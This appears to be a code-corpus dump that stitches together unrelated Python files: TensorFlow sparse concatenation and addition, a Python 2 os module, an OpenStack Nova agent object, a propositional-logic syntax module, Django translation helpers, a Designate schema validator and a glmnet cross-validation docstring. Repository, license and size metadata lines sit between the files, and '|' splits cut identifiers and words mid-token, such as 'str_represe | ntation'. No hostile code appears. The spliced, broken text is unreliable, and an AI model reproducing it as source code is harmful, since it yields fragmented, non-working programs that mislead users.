from tensorflow.python.util.tf_export import tf_export
def _convert_to_sparse_tensor(sp_input):
"""Convert `sp_input` to `SparseTensor` and return it.
Args:
sp_input: `SparseTensor` or `SparseTensorValue`.
Returns:
`sp_input` converted to `SparseTensor`.
Raises:
ValueError: if `sp_input` is neither `SparseTensor` nor `SparseTensorValue`.
"""
if isinstance(sp_input, sparse_tensor.SparseTensorValue):
return sparse_tensor.SparseTensor.from_value(sp_input)
if not isinstance(sp_input, sparse_tensor.SparseTensor):
raise TypeError("Input must be a SparseTensor.")
return sp_input
def _convert_to_sparse_tensors(sp_inputs):
"""Convert `sp_inputs` to `SparseTensor` objects and return them.
Args:
sp_inputs: `list` or `tuple` of `SparseTensor` or `SparseTensorValue`
objects.
Returns:
`sp_inputs` converted to `SparseTensor` objects.
Raises:
ValueError: if any item in `sp_inputs` is neither `SparseTensor` nor
`SparseTensorValue`.
"""
if isinstance(sp_inputs, list):
return [_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs]
if isinstance(sp_inputs, tuple):
return (_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs)
raise TypeError("Inputs must be a list or tuple.")
# pylint: disable=protected-access
@tf_export("sparse_concat")
def sparse_concat(axis,
sp_inputs,
name=None,
expand_nonconcat_dim=False,
concat_dim=None):
"""Concatenates a list of `SparseTensor` along the specified dimension.
Concatenation is with respect to the dense versions of each sparse input.
It is assumed that each inputs is a `SparseTensor` whose elements are ordered
along increasing dimension number.
If expand_nonconcat_dim is False, all inputs' shapes must match, except for
the concat dimension. If expand_nonconcat_dim is True, then inputs' shapes are
allowed to vary among all inputs.
The `indices`, `values`, and `shapes` lists must have the same length.
If expand_nonconcat_dim is False, then the output shape is identical to the
inputs', except along the concat dimension, where it is the sum of the inputs'
sizes along that dimension.
If expand_nonconcat_dim is True, then the output shape along the non-concat
dimensions will be expand to be the largest among all inputs, and it is the
sum of the inputs sizes along the concat dimension.
The output elements will be resorted to preserve the sort order along
increasing dimension number.
This op runs in `O(M log M)` time, where `M` is the total number of non-empty
values across all inputs. This is due to the need for an internal sort in
order to concatenate efficiently across an arbitrary dimension.
For example, if `axis = 1` and the inputs are
sp_inputs[0]: shape = [2, 3]
[0, 2]: "a"
[1, 0]: "b"
[1, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
then the output will be
shape = [2, 7]
[0, 2]: "a"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[1, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b c ] [ ] [b c ]
Another example, if 'axis = 1' and the inputs are
sp_inputs[0]: sha
|
pe = [3, 3]
[0, 2]: "a"
[1, 0]: "b"
[2, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
if expand_nonconcat_dim = False, this will result in an error. But if
expand_nonconcat_dim = True, this will result in:
shape = [3, 7]
[0, 2]: "a
|
"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[2, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b ] [ ] [b ]
[ c ] [ c ]
Args:
axis: Dimension to concatenate along. Must be in range [-rank, rank),
where rank is the number of dimensions in each input `SparseTensor`.
sp_inputs: List of `SparseTensor` to concatenate.
name: A name prefix for the returned tensors (optional).
expand_nonconcat_dim: Whether to allow the expansion in the non-concat
dimensions. Defaulted to False.
concat_dim: The old (deprecated) name for axis.
Returns:
A `SparseTensor` with the concatenated output.
Raises:
TypeError: If `sp_inputs` is not a list of `SparseTensor`.
"""
axis = deprecation.deprecated_argument_lookup("axis", axis, "concat_dim",
concat_dim)
sp_inputs = _convert_to_sparse_tensors(sp_inputs)
if len(sp_inputs) == 1: # Degenerate case of one tensor.
return sp_inputs[0]
inds = [sp_input.indices for sp_input in sp_inputs]
vals = [sp_input.values for sp_input in sp_inputs]
shapes = [sp_input.dense_shape for sp_input in sp_inputs]
if expand_nonconcat_dim:
max_shape = math_ops.reduce_max(
array_ops.concat(
[array_ops.reshape(shape, [1, -1]) for shape in shapes], 0), 0)
shapes = [
array_ops.concat([
max_shape[:axis], shape[-1:]
if axis == -1 else shape[axis:axis + 1], []
if axis == -1 else max_shape[axis + 1:]
], 0) for shape in shapes
]
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_concat(inds, vals, shapes, axis, name=name))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_add")
def sparse_add(a, b, thresh=0):
"""Adds two tensors, at least one of each is a `SparseTensor`.
If one `SparseTensor` and one `Tensor` are passed in, returns a `Tensor`. If
both arguments are `SparseTensor`s, this returns a `SparseTensor`. The order
of arguments does not matter. Use vanilla `tf.add()` for adding two dense
`Tensor`s.
The shapes of the two operands must match: broadcasting is not supported.
The indices of any input `SparseTensor` are assumed ordered in standard
lexicographic order. If this is not the case, before this step
|
MicroTrustRepos/microkernel
|
src/l4/pkg/python/contrib/Lib/os.py
|
Python
|
gpl-2.0
| 26,337
| 0.003038
|
r"""OS routines for Mac, NT, or Posix depending on what system we're on.
This exports:
- all functions from posix, nt, os2, or ce, e.g. unlink, stat, etc.
- os.path is one of the modules posixpath, or ntpath
- os.name is 'posix', 'nt', 'os2', 'ce' or 'riscos'
- os.curdir is a string representing the current directory ('.' or ':')
- os.pardir is a string representing the parent directory ('..' or '::')
- os.sep is the (or a most common) pathname separator ('/' or ':' or '\\')
- os.extsep is the extension separator ('.' or '/')
- os.altsep is the alternate pathname separator (None or '/')
- os.pathsep is the component separator used in $PATH etc
- os.linesep is the line separator in text files ('\r' or '\n' or '\r\n')
- os.defpath is the default search path for executables
- os.devnull is the file path of the null device ('/dev/null', etc.)
Programs that import and use 'os' stand a better chance of being
portable between different platforms. Of course, they must then
only use functions that are defined by all platforms (e.g., unlink
and opendir), and leave all pathname manipulation to os.path
(e.g., split and join).
"""
#'
import sys, errno
_names = sys.builtin_module_names
# Note: more names are added to __all__ later.
__all__ = ["altsep", "curdir", "pardir", "sep", "extsep", "pathsep", "linesep",
"defpath", "name", "path", "devnull",
"SEEK_SET", "SEEK_CUR", "SEEK_END"]
def _get_exports_list(module):
try:
return list(module.__all__)
except AttributeError:
return [n for n in dir(module) if n[0] != '_']
if 'posix' in _names:
name = 'posix'
linesep = '\n'
from posix import *
try:
from posix import _exit
except ImportError:
pass
import posixpath as path
import posix
__all__.extend(_get_exports_list(posix))
del posix
elif 'nt' in _names:
name = 'nt'
linesep = '\r\n'
from nt import *
try:
from nt import _exit
except ImportError:
pass
import ntpath as path
import nt
__all__.extend(_get_exports_list(nt))
del nt
elif 'os2' in _names:
name = 'os2'
linesep = '\r\n'
from os2 import *
try:
from os2 import _exit
except ImportError:
pass
if sys.version.find('EMX GCC') == -1:
import ntpath as path
else:
import os2emxpath as path
from _emx_link import link
import os2
__all__.extend(_get_exports_list(os2))
del os2
elif 'ce' in _names:
name = 'ce'
linesep = '\r\n'
from ce import *
try:
from ce import _exit
except ImportError:
pass
# We can use the standard Windows path.
import ntpath as path
import ce
__all__.extend(_get_exports_list(ce))
del ce
elif 'riscos' in _names:
name = 'riscos'
linesep = '\n'
from riscos import *
try:
from riscos import _exit
except ImportError:
pass
import riscospath as path
import riscos
__all__.extend(_get_exports_list(riscos))
del riscos
else:
raise ImportError, 'no os specific module found'
sys.modules['os.path'] = path
from os.path import (curdir, pardir, sep, pathsep, defpath, extsep, altsep,
devnull)
del _names
# Python uses fixed values for the SEEK_ constants; they are mapped
# to native constants if necessary in posixmodule.c
SEEK_SET = 0
SEEK_CUR = 1
SEEK_END = 2
#'
# Super directory utilities.
# (Inspired by Eric Raymond; the doc strings are mostly his)
def makedirs(name, mode=0777):
"""makedirs(path [, mode=0777])
Super-mkdir; create a leaf directory and all intermediate ones.
Works like mkdir, except that any intermediate path segment (not
just the rightmost) will be created if it does not exist. This is
recursive.
"""
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
if head and tail and not path.exists(head):
try:
makedirs(head, mode)
except OSError, e:
# be happy if someone already created the path
if e.errno != errno.EEXIST:
raise
if tail == curdir: # xxx/newdir/. exists if xxx/newdir exists
return
mkdir(name, mode)
def removedirs(name):
"""removedirs(path)
Super-rmdir; remove a leaf directory and all empty intermediate
ones. Works like rmdir except that, if the leaf directory is
successfully removed, directories corresponding to rightmost path
segments will be pruned away until either the whole path is
consumed or an error occurs. Errors during this latter phase are
ignored -- they generally mean that a directory was not empty.
"""
rmdir(name)
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
while head and tail:
try:
rmdir(head)
except error:
break
head, tail = path.split(head)
def renames(old, new):
"""renames(old, new)
Super-rename; create directories as necessary and delete any left
empty. Works like rename, except creation of any intermediate
directories needed to make the new pathname good is attempted
first. After the rename, directories corresponding to rightmost
path segments of the old name will be pruned way until either the
whole path is consumed or a nonempty directory is found.
Note: this function can fail with the new directory structure made
if you lack permissions needed to unlink the leaf directory or
file.
"""
head, tail = path.split(new)
if head and tail and not path.exists(head):
makedirs(head)
rename(old, new)
head, tail = path.split(old)
if head and tail:
try:
removedirs(head)
except error:
pass
__all__.extend(["makedirs", "removedirs", "renames"])
def walk(top, topdown=True, onerror=None, followlinks=False):
"""Directory tree generator.
For each directory in the directory tree rooted at top (including top
itself, but excluding '.' and '..'), yields a 3-tuple
dirpath, dirnames, filenames
dirpath is a string, the path to the directory. dirnames is a list of
the names of the subdirectories in dirpath (excluding '.' and '..').
filenames is a list of the names of the non-directory files in dirpath.
Note that the names in the lists are just names, with no path components.
To get a full path (which begins with top) to a file or directory in
dirpath, do os.path.join(dirpath, name).
If optional arg 'topdown' is true or not specified, the triple for a
directory is generated before the triples for any of its subdirectories
(directories are generated top down). If topdown is false, the triple
for a directory is generated after the triples for all of its
subdirectories (directories are generated bottom up).
When topdown is true, the caller can modify the dirnames list in-place
(e.g., via del or slice assignment), and walk will only recurse into the
subdirectories whose names remain in dirnames; this can be used to prune
the search, or to impose a specific order of visiting. Modifying
dirnames when topdown is false is ineffective, since the directories in
dirnames have already been
|
generated by the time dirnames itself is
generated.
By default errors from the os.listdir() call are ignored. If
optional arg 'onerror' is specified, it should be a function; it
will be called with one argument, an os.error instance. It can
report the error to continue with the walk, or raise the exception
to abort the wa
|
lk. Note that the filename is available as the
filename attribute of the exception object.
By default, os.walk does not follow symbolic links to subdirectories on
systems that support them. In order to get this functionality, set the
optional argument 'followlinks' to true.
Caution: if you pass a relative pathname for top, don't change the
current working directory between resumptions of walk. walk never
changes the current directory, and
|
ChinaMassClouds/copenstack-server
|
openstack/src/nova-2014.2/nova/objects/agent.py
|
Python
|
gpl-2.0
| 2,828
| 0
|
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.
|
0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writ
|
ing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
class Agent(base.NovaPersistentObject, base.NovaObject):
VERSION = '1.0'
fields = {
'id': fields.IntegerField(read_only=True),
'hypervisor': fields.StringField(),
'os': fields.StringField(),
'architecture': fields.StringField(),
'version': fields.StringField(),
'url': fields.StringField(),
'md5hash': fields.StringField(),
}
@staticmethod
def _from_db_object(context, agent, db_agent):
for name in agent.fields:
agent[name] = db_agent[name]
agent._context = context
agent.obj_reset_changes()
return agent
@base.remotable_classmethod
def get_by_triple(cls, context, hypervisor, os, architecture):
db_agent = db.agent_build_get_by_triple(context, hypervisor,
os, architecture)
if not db_agent:
return None
return cls._from_db_object(context, objects.Agent(), db_agent)
@base.remotable
def create(self, context):
updates = self.obj_get_changes()
if 'id' in updates:
raise exception.ObjectActionError(action='create',
reason='Already Created')
db_agent = db.agent_build_create(context, updates)
self._from_db_object(context, self, db_agent)
@base.remotable
def destroy(self, context):
db.agent_build_destroy(context, self.id)
@base.remotable
def save(self, context):
updates = self.obj_get_changes()
db.agent_build_update(context, self.id, updates)
self.obj_reset_changes()
class AgentList(base.ObjectListBase, base.NovaObject):
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('Agent'),
}
child_versions = {
'1.0': '1.0',
}
@base.remotable_classmethod
def get_all(cls, context, hypervisor=None):
db_agents = db.agent_build_get_all(context, hypervisor=hypervisor)
return base.obj_make_list(context, cls(), objects.Agent, db_agents)
|
italopaiva/propositional-logic
|
lp/syntax.py
|
Python
|
mit
| 7,307
| 0.002874
|
"""Describe the language syntax."""
import re
class Symbol:
"""Describes the language symbols."""
# General pattern of formulas
pattern = '([a-z0-9&\-\|><\(\)]*)'
accepted_chars = '([a-z0-9&\-\|><\(\)]*)'
def __init__(self, value):
"""Init a propositional symbol."""
self.value = value
@classmethod
def check(cls, symbol):
"""Check if the given arg is a symbol."""
regexp = re.compile(r'^%s$' % cls.pattern)
return regexp.match(symbol)
@classmethod
def accepts_initial_char(cls, char):
"""Check if the operator accepts the given char as initial char."""
regexp = re.compile(r'^%s$' % cls.accepted_initial_char)
return regexp.match(char)
def is_a(self, cls):
"""Check if this token is a given type."""
return isinstance(self, cls)
def __str__(self):
"""Return the symbol value as str."""
return self.value
class PropositionalSymbol(Symbol):
"""
Describes the propositional symbols of the language.
The propositional symbols are represented by any
lowercase letter, followed or not by an integer index.
Examples:
p, p1, q23, r1890
"""
accepted_initial_char = '[a-z]'
pattern = '([a-z]{1}[0-9]*)'
def subformulas(self):
"""
Get the formula subformulas.
Return itself as it is a propositional symbol.
"""
return [self]
def str_representation(self):
"""String representation of the symbol."""
return self.value
def evaluate(self, symbol_values):
"""Evaluate symbol with given values."""
return symbol_values[self.str_representation()]
def count_terms(self):
"""Count the terms of the formula."""
return 1
class PontuationSymbol(Symbol):
"""
Describes the pontuation symbols of the language.
The pontuation symbols are represented by the
opening and closing parenthesis.
"""
pattern = '([\(\)])'
class OpeningParenthesis(PontuationSymbol):
"""Describes the opening parenthesis."""
accepted_initial_char = '\('
pattern = '\('
class ClosingParenthesis(PontuationSymbol):
"""Describes the closing parenthesis."""
accepted_initial_char = '\)'
pattern = '\)'
class Operator(Symbol):
"""Base class for language operators."""
class Associativity:
"""Possible operators associativity."""
LEFT = 1
RIGHT = 0
def subformulas(self):
"""Get the formula subformulas."""
raise NotImplementedError
def evaluate(self, symbol_values):
"""Evaluate an operator with given values."""
raise NotImplementedError
def __str__(self):
"""Return the string representation as str."""
return self.str_representation()
class BinaryOperator(Operator):
"""Describe binary operators."""
def set_args(self, arg1, arg2):
"""Set the operator args."""
self.arg1 = arg1
self.arg2 = arg2
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its first and second args.
"""
return self.arg1.subformulas() + self.arg2.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol) or (
self.arg1.is_a(Operator) and
self.precendence <= self.arg1.precendence
):
# In this case do not need parenthesis
arg1_repr = self.arg1.str_representation()
else:
arg1_repr = '(' + self.arg1.str_representation() + ')'
if self.arg2.is_a(PropositionalSymbol) or (
self.arg2.is_a(Operator) and
self.precendence <= self.arg2.precendence
):
arg2_repr = self.arg2.str_represe
|
ntation()
else:
arg2_repr = '(' + self.arg2.str_representation() + ')'
return arg1_repr + self.SYMBOL + arg2_repr
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms() + self.arg2.count_terms()
class UnaryOperator(Operator):
"""Describe unary operators."""
|
def set_arg(self, arg):
"""Set the operator arg."""
self.arg1 = arg
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its arg.
"""
return self.arg1.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol):
return self.SYMBOL + self.arg1.str_representation()
else:
return self.SYMBOL + '(' + self.arg1.str_representation() + ')'
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms()
class Negation(UnaryOperator):
"""Describe the negation operator."""
SYMBOL = '-'
accepted_initial_char = '\-'
pattern = '\-'
precendence = 6
associativity = Operator.Associativity.RIGHT
def evaluate(self, symbol_values):
"""Evaluate a negation with given values."""
return not self.arg1.evaluate(symbol_values)
class Conjunction(BinaryOperator):
"""Describe the conjunction operator."""
SYMBOL = '&'
accepted_initial_char = '&'
pattern = '&'
precendence = 5
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a conjunction with given values."""
return (self.arg1.evaluate(symbol_values) and
self.arg2.evaluate(symbol_values))
class Disjunction(BinaryOperator):
"""Describe the disjunction operator."""
SYMBOL = '|'
accepted_initial_char = '\|'
pattern = '\|'
precendence = 4
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a disjunction with given values."""
return (self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class Implication(BinaryOperator):
"""Describe the implication operator."""
SYMBOL = '->'
accepted_initial_char = '\-'
pattern = '\->'
precendence = 3
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate an implication with given values.
To do the trick: p -> q = -p | q
"""
return (not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class BiImplication(BinaryOperator):
"""Describe the bi-implication operator."""
SYMBOL = '<->'
accepted_initial_char = '<'
pattern = '<\->'
precendence = 2
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate a bi-implication with given values.
To do the trick: p <-> q = (p -> q) & (q -> p) = (-p | q) & (-q | p)
"""
return (
not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values)
) and (
not self.arg2.evaluate(symbol_values) or
self.arg1.evaluate(symbol_values)
)
|
aarpon/obit_microscopy_core_technology
|
core-plugins/microscopy/3/dss/drop-boxes/MicroscopyDropbox/GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm.py
|
Python
|
apache-2.0
| 1,343
| 0.005957
|
# -*- coding: utf-8 -*
|
-
'''
Created on Apr 27, 2016
@author: Aaron Ponti
'''
from ch.systemsx.cisd.openbis.dss.etl.dto.api.impl import MaximumIntensityProjectionGenerationAlgorithm
class GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm(MaximumIntensityProjectionGenerationAlgorithm):
|
'''
Custom MaximumIntensityProjectionGenerationAlgorithm for Generic TIFF Series
that makes sure that the first timepoint in a series is registered for
creation of the representative thumbnail.
'''
def __init__(self, datasetTypeCode, width, height, filename):
"""
Constructor
"""
# Call the parent base constructor
MaximumIntensityProjectionGenerationAlgorithm.__init__(self,
datasetTypeCode, width, height, filename)
def imageToBeIgnored(self, image):
"""
Overrides the parent imageToBeIgnored method. The selection of which
series should be used to create the representative thumbnail is done
in GenericTIFFSeriesCompositeDatasetConfig. Here we prevent the base
MaximumIntensityProjectionGenerationAlgorithm.imageToBeIgnored() method
to make a decision based on the timepoint (== 0), since we cannot know
which is the first time point in a Generic TIFF Series.
"""
return False
|
javiteri/reposdmpdos
|
miltonvz/run.py
|
Python
|
gpl-2.0
| 176
| 0.005682
|
''
|
'
Created on 17/2/2015
@author: PC06
Primer cambio en el proyecto
'''
from include import app
if __name__ == '__main__':
app.run(
|
"127.0.0.1", 9000, debug=True)
|
greggian/TapdIn
|
django/utils/translation/trans_real.py
|
Python
|
apache-2.0
| 20,192
| 0.00213
|
"""Translation helper functions."""
import locale
import os
import re
import sys
import gettext as gettext_module
from cStringIO import StringIO
from django.utils.importlib import import_module
from django.utils.safestring import mark_safe, SafeData
from django.utils.thread_support import currentThread
# Translations are cached in a dictionary for every language+app tuple.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = {}
# The default translation is based on the settings file.
_default = None
# This is a cache for normalized accept-header languages to prevent multiple
# file lookups when checking the same locale on repeated requests.
_accepted = {}
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def to_locale(language, to_lower=False):
"""
Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
True, the last component is lower-cased (en_us).
"""
p = language.find('-')
if p >= 0:
if to_lower:
return language[:p].lower()+'_'+language[p+1:].lower()
else:
return language[:p].lower()+'_'+language[p+1:].upper()
else:
return language.lower()
def to_language(locale):
"""Turns a locale name (en_US) into a language name (en-us)."""
p = locale.find('_')
if p >= 0:
return locale[:p].lower()+'-'+locale[p+1:].lower()
else:
return locale.lower()
class DjangoTranslation(gettext_module.GNUTranslations):
"""
This class sets up the GNUTranslations context with regard to output
charset. Django uses a defined DEFAULT_CHARSET as the output charset on
Python 2.4. With Python 2.3, use DjangoTranslation23.
"""
def __init__(self, *args, **kw):
from django.conf import settings
gettext_module.GNUTranslations.__init__(self, *args, **kw)
# Starting with Python 2.4, there's a function to define
# the output charset. Before 2.4, the output charset is
# identical with the translation file charset.
try:
self.set_output_charset('utf-8')
except AttributeError:
pass
self.django_output_charset = 'utf-8'
self.__language = '??'
def merge(self, other):
self._catalog.update(other._catalog)
def set_language(self, language):
self.__language = language
def language(self):
return self.__language
def __repr__(self):
return "<DjangoTranslation lang:%s>" % self.__language
class DjangoTranslation23(DjangoTranslation):
"""
Compatibility class that is only used with Python 2.3.
Python 2.3 doesn't support set_output_charset on translation objects and
needs this wrapper class to make sure input charsets from translation files
are correctly translated to output charsets.
With a full switch to Python 2.4, this can be removed from the source.
"""
def gettext(self, msgid):
res = self.ugettext(msgid)
return res.encode(self.django_output_charset)
def ngettext(self, msgid1, msgid2, n):
res = self.ungettext(msgid1, msgid2, n)
return res.encode(self.django_output_charset)
def translation(language):
"""
Returns a translation object.
This translation object will be constructed out of multiple GNUTranslations
objects by merging their catalogs. It will construct a object for the
requested language and add a fallback to the default language, if it's
different from the requested language.
"""
global _translations
t = _translations.get(language, None)
if t is not None:
return t
from django.conf import settings
# set up the right translation class
klass = DjangoTranslation
if sys.version_info < (2, 4):
klass = DjangoTranslation23
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
if settings.SETTINGS_MODULE is not None:
parts = settings.SETTINGS_MODULE.split('.')
project = import_module(parts[0])
projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
else:
projectpath = None
def _fetch(lang, fallback=None):
global _translations
loc = to_locale(lang)
res = _translations.get(lang, None)
if res is not None:
return res
def _translation(path):
try:
t = gettext_module.translation('django', path, [loc], klass)
t.set_language(lang)
return t
except IOError, e:
return None
res = _translation(globalpath)
# We want to ensure that, for example, "en-gb" and "en-us" don't share
# the same translation object (thus, merging en-us with a local update
# doesn't affect en-gb), even though they will both use the core "en"
# translation. So we have to subvert Python's internal gettext caching.
base_lang = lambda x: x.split('-', 1)[0]
if base_lang(lang) in [base_lang(trans) for trans in _translations]:
res._info = res._info.copy()
res._catalog = res._catalog.copy()
def _merge(path):
t = _translation(path)
if t is not None:
if res is None:
return t
else:
res.merge(t)
return res
for localepath in settings.LOCALE_PATHS:
if os.path.isdir(localepath):
res = _merge(localepath)
if projectpath and os.path.isdir(projectpath):
res = _merge(projectpath)
for appname in settings.INSTALLED_APPS:
|
app = import_module(appname)
apppath = os.path.join(os.path.dirname(app.__file__), 'locale')
if os.path.isdir(apppath):
res = _merge(apppath)
if res is None:
if fallback is not None:
res =
|
fallback
else:
return gettext_module.NullTranslations()
_translations[lang] = res
return res
default_translation = _fetch(settings.LANGUAGE_CODE)
current_translation = _fetch(language, fallback=default_translation)
return current_translation
def activate(language):
"""
Fetches the translation object for a given tuple of application name and
language and installs it as the current translation object for the current
thread.
"""
_active[currentThread()] = translation(language)
def deactivate():
"""
Deinstalls the currently active translation object so that further _ calls
will resolve against the default translation object, again.
"""
global _active
if currentThread() in _active:
del _active[currentThread()]
def deactivate_all():
"""
Makes the active translation object a NullTranslations() instance. This is
useful when we want delayed translations to appear as the original string
for some reason.
"""
_active[currentThread()] = gettext_module.NullTranslations()
def get_language():
"""Returns the currently selected language."""
t = _active.get(currentThread(), None)
if t is not None:
try:
return to_language(t.language())
except AttributeError:
pass
# If we don't have a real translation object, assume it's the default language.
from django.conf import settings
return settings.LANGUAGE_CODE
def get_language_bidi():
"""
Returns selected language's BiDi layout.
False = left-to-right l
|
finiteloopsoftware/django-compressor
|
compress/utils.py
|
Python
|
bsd-3-clause
| 69
| 0
|
def get_file_exten
|
sio
|
n(filename):
return filename.split(".")[-1]
|
openstack/designate
|
designate/schema/__init__.py
|
Python
|
apache-2.0
| 3,897
| 0
|
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from designate import exceptions
from designate.schema import format
from designate.schema import resolvers
from designate.schema import validators
from designate import utils
LOG = logging.getLogger(__name__)
class Schema(object):
def __init__(self, version, name):
self.raw_schema = utils.load_schema(version, name)
self.resolver = resolvers.LocalResolver.from_schema(
version, self.raw_schema)
if version in ['v2', 'admin']:
self.validator = validators.Draft4Validator(
self.raw_schema, resolver=self.resolver,
format_checker=format.draft4_format_checker)
else:
raise Exception('Unknown API version: %s' % version)
@property
def schema(self):
return self.validator.schema
@property
def properties(self):
return self.schema['properties']
@property
def links(self):
return self.schema['links']
@property
def raw(self):
return self.raw_schema
def validate(self, obj):
LOG.debug('Validating values: %r' % obj)
errors = []
for error in self.validator.iter_errors(obj):
errors.append({
'path': ".".join([str(x) for x in error.path]),
'message': error.message,
'validator': error.validator
})
if len(errors) > 0:
LOG.debug('Errors in validation: %r' % errors)
raise exceptions.InvalidObject("Provided object does not match "
"schema", errors=errors)
def filter(self, instance, properties=None):
if not properties:
properties = self.properties
filtered = {}
for name, subschema in list(properties.items()):
if 'type' in subschema and subschema['type'] == 'array':
subinstance = instance.get(name, None)
filtered[
|
name] = self._filter_array(subinsta
|
nce, subschema)
elif 'type' in subschema and subschema['type'] == 'object':
subinstance = instance.get(name, None)
properties = subschema['properties']
filtered[name] = self.filter(subinstance, properties)
else:
filtered[name] = instance.get(name, None)
return filtered
def _filter_array(self, instance, schema):
if 'items' in schema and isinstance(schema['items'], list):
# NOTE(kiall): We currently don't make use of this..
raise NotImplementedError()
elif 'items' in schema:
schema = schema['items']
if '$ref' in schema:
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
properties = schema['properties']
return [self.filter(i, properties) for i in instance]
elif 'properties' in schema:
schema = schema['properties']
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
return [self.filter(i, schema) for i in instance]
else:
raise NotImplementedError('Can\'t filter unknown array type')
|
hanfang/glmnet_python
|
glmnet_python/cvglmnet.py
|
Python
|
gpl-2.0
| 14,450
| 0.010242
|
# -*- coding: utf-8 -*-
"""
--------------------------------------------------------------------------
cvglmnet.m: cross-validation for glmnet
--------------------------------------------------------------------------
DESCRIPTION:
Does k-fold cross-validation for glmnet, produces a plot, and returns
a value for lambdau. Cross-validation is not implemented for Cox model yet.
USAGE:
Note that like glmnet, all arguments are keyword-only:
CVerr = cvglmnet(x, y, family, options, type, nfolds, foldid,
parallel, keep, grouped);
Fewer input arguments(more often) are allowed in the call. Default values
for the arguments are used unless specified by the user.
=======================
INPUT ARGUMENTS
x nobs x nvar scipy 2D array of x parameters (as in glmnet).
y nobs x nc scipy Response y as in glmnet.
family Response type as family in glmnet.
options Options as in glmnet.
ptype loss to use for cross-validation. Currently five options, not
all available for all models. The default is ptype='deviance', which uses
squared-error for Gaussian models (a.k.a ptype='mse' there), deviance for
logistic and Poisson regression, and partial-likelihood for the Cox
model (Note that CV for cox model is not implemented yet).
ptype='class' applies to binomial and multinomial logistic
regression only, and gives misclassification error. ptype='auc' is for
two-class logistic regression only, and gives area under the ROC curve.
ptype='mse' or ptype='mae' (mean absolute error) can be used by all models
except the 'cox'; they measure the deviation from the fitted mean to the
response.
nfolds number of folds - default is 10. Although nfolds can be as
large as the sample size (leave-one-out CV), it is not recommended for
large datasets. Smallest value allowable is nfolds=3.
foldid an optional vector of values between 1 and nfold identifying
what fold each observation is in. If supplied, nfold can be
missing.
parallel If True, use parallel computation to fit each fold.
keep If keep=True, a prevalidated array is returned containing
fitted values for each observation and each value of lambda.
This means these fits are computed with this observation and
the rest of its fold omitted. The foldid vector is also
returned. Default is keep=False.
grouped This is an experimental argument, with default true, and can
be ignored by most users. For all models except the 'cox',
this refers to computing nfolds separate statistics, and then
using their mean and estimated standard error to describe the
CV curve. If grouped=false, an error matrix is built up at
the observation level from the predictions from the nfold
fits, and then summarized (does not apply to
type='auc'). For the 'cox' family, grouped=true obtains the
CV partial likelihood for the Kth fold by subtraction; by
subtracting the log partial likelihood evaluated on the full
dataset from that evaluated on the on the (K-1)/K dataset.
This makes more efficient use of risk sets. With
grouped=FALSE the log partial likelihood is computed only on
the Kth fold.
=======================
OUTPUT ARGUMENTS:
A dict() is returned with the following fields.
lambdau the values of lambda used in the fits.
cvm the mean cross-validated error - a vector of length
length(lambdau).
cvsd estimate of standard error of cvm.
cvup upper curve = cvm+cvsd.
